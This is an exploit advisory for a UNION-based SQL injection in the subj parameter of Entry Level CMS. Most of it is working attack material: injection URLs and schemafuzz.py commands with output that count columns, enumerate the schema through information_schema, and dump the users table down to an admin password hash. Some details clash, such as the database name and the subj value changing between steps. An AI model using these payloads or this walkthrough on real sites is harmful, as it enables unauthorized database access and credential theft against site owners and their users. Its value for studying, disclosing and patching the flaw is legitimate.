SQL Injection Entry Level Content Management System (EL CMS) with schemafuzz.py

2010.03.25
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[+] Title : SQL Injection Entry Level Content Management System (EL CMS) with schemafuzz.py

--==[ Author ]==--
[+] Author  : HaMaDa SCoOoRPioN (NEWBIE)
[+] Contact : 0u@linuxmail.org
[+] Group   : The ISLAM OF DEFENDERS AND ATTACK
[+] Site    : www.islam-defenders.com

********************************************
[ Software Information ]
[+] Software      : Entry Level Content Management System (EL CMS)
[+] Vendor        : http://www.entrylevelcms.com/
[+] Vulnerability : SQL Injection
********************************************

[ Vulnerable File ]
http://localhost/website/index.php?subj=4

The subj parameter is placed into the SQL query unfiltered and unquoted, so a numeric payload with no quote character is enough for a UNION-based injection.

[ Demo with schemafuzz.py ]

Step 1: find the number of columns in the vulnerable SELECT and the column that is echoed back in the page (--findcol).

C:\Python26\exploit\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6" --findcol
|---------------------------------------------------------------
| 0u[at]linuxmail[dot]org v5.0 | 6/2008 schemafuzz.py
| -MySQL v5+ Information_schema Database Enumeration
| -MySQL v4+ Data Extractor
| -MySQL v4+ Table & Column Fuzzer
| Usage: schemafuzz.py [options]
| -h help darkc0de.com
|------------------------------------------------------------
[+] URL: http://localhost/website/index.php?subj=6--
[+] Evasion Used: "+" "--"
[+] 03:36:40
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 0
[+] SQLi URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+0,1,2,3--
[+] darkc0de URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3
[-] Done!

Step 2: with the darkc0de URL as the injection point, enumerate the server configuration and the schema through information_schema (--full).

C:\Python26\exploit\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3" --full
[+] URL: http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3--
[+] Evasion Used: "+" "--"
[+] 05:33:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: vman
User: root@localhost
Version: 5.0.51a
[Database]: elcms_db
[Table: Columns]
[0] pages: id,subject_id,menu_name,position,visible,content
[1] subjects: id,menu_name,position,visible
[2] users: id,username,hashed_password
[-] [05:55:27]
[-] Total URL Requests 17
[-] Done

Step 3: dump the users table (--dump). Only column 0 is reflected, so the tool concatenates the requested fields into that column, separated by ':'.

C:\Python26\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3" --dump -D elcms_db -T users -C id,username,hashed_password
[+] URL: http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3--
[+] Evasion Used: "+" "--"
[+] 05:35:14
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: vman
User: root@localhost
Version: 5.0.51a
[+] Dumping data from database "vman" Table "users"
[+] Column(s) ['id', 'username', 'hashed_password']
[+] Number of Rows: 1
[0] 9:admin:376cb350808d766e547eadc45b8f19f541d436c8:376cb350808d766e547eadc45b8f19f541d436c8:
[-] [05:35:15]
[-] Total URL Requests 3
[-] Done

Note that the application connects as root@localhost: the injection runs with full MySQL privileges, not just read access to the CMS database.

For the full list of options, run: schemafuzz.py -h

********************************************
-- Thank YOU BRO
HaMaDa SCoOoRPioN
www.islam-defenders.com
0u@linuxmail.org

References:

http://secunia.com/advisories/38688
http://packetstormsecurity.org/1002-exploits/elcms-sql.txt
http://osvdb.org/62513

